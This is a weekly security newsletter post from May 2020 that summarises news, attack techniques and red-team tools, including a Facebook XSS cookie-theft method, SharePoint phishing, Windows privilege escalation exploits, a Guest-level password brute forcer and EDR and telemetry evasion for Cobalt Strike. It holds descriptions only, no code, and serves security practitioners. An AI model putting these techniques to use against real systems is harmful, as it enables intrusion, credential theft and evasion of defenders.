Last Week in Security (LWiS) - 2020-05-18
A COM-based lateral movement from @bohops, a new potato windows LPE variant from @splinter_code, a local Windows brute forcer from @DarkCoderSc, and more!
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-05-11 to 2020-05-18. MITRE ATT&CK techniques are in brackets where appropriate.
News
- Zoom Acquires Keybase and Announces Goal of Developing the Most Broadly Used Enterprise End-to-End Encryption Offering. Good news for Zoom, probably bad news for keybase users.
- Zerodium Drops Payouts For iOS/Safari Exploits. It looks like there are lots of people finding iOS exploits, perhaps due to the recent iOS 14 leak.
Techniques
- $20,000 Facebook DOM XSS uses postMessage to send a payload with a javascript url element to Facebook's login button endpoint, which executes the javascript on the facebook domain. In the demo this is used to steal the user's cookies (account takeover).
- Flash Player & Background updates from an internal server via mms.cfg provides a potential persistence mechanism for Windows computers running Flash (RIP).
- WS-Management COM: Another Approach for WinRM Lateral Movement uses the WSMAN.Automation COM object over WinRM and there are PoCs in C#, C++, Visual Basic Script, Jscript, and Powershell. Code here.
- Using SharePoint as a Phishing Platform from nccgroup shows how SharePoint (normally a trusted domain) can be used to create phishing pages for credential harvesting.
- Hacking Reolink cameras for fun and profit is a very well written and complete writeup of the process of hacking and improving an IP camera. Even if you aren't interested in embedded devices, this post is written so well you will enjoy the journey.
Tools and Exploits
- Security Flaws in Adobe Acrobat Reader Allow Malicious Program to Gain Root on macOS Silently. Another XPC logic flaw leads to local privilege escalation on macOS. Expect more of these in the near future as this technique is spreading among researchers. [T1068 Exploitation for Privilege Escalation]
- Windows Local Privilege Escalation (at what point will this need its own section?) [T1068 Exploitation for Privilege Escalation]
- PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more). Legacy Windows features are the gift that keeps on giving as Print Spooler. Code here.
- Invoke-PrintDemon is a PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell dll already embedded which levages CVE-2020-1048 for privilege escalation.
- No more JuicyPotato? Old story, welcome RoguePotato! the latest in the resilient "potato" line of exploits takes inspiration from PrintSpoofer (LWiS-2020-05-04). Microsoft says elevating from Local Service with SeImpersonate to SYSTEM is expected behavior so this will not be fixed! Code here.
- dalfox is a parameter analysis and XSS scanning tool written in Go. Use it to find your own 20k bounty!
- hellscape is a GIMPLE obfuscator for C, C++, Go, ... all supported GCC targets and front-ends that use GIMPLE. [T1066 Indicator Removal from Tools]
- win-brute-logon - crack any Microsoft Windows users password without any privilege (Guest account included). Since Windows doesn't have a lockout on local password attempts by default, you can brute force at high speeds locally, even from Guest.
- Stormspotter is an Azure Red Team tool for graphing Azure and Azure Active Directory objects. Bloodhound for the cloud.
- CarbonMonoxide EDR Evasion - Combination of SwampThing - TikiTorch
- SharpRDPCheck checks credentials or ntlmhashes against remote Remote Desktop Protocol endpoints.
- BlockEtw a injectable .NET 3.5/4 assembly to block ETW telemetry in a process. Self inject in cobalt strike to prevent telemetry on beacon.
- SharpeningCobaltStrike - realtime .Net v3.5/4.0 compiler for your linux Cobalt Strike C2. It generates new freshly compiled and obfuscated binaries each use.
Utilities
- vscode-drawio brings the great open source diagraming tool into VSCode.
- yubikey-agent simplifies the arduous yubikey setup process to just a single command. This setup does not create an encrypted backup though, so a lost or broken yubikey cannot be restored.
- lens is a cross platform IDE for managing Kubernetes clusters. Nothing extra needs to be installed on the pods, just run the app and start managing.
This post is cross-posted on SIXGEN's blog.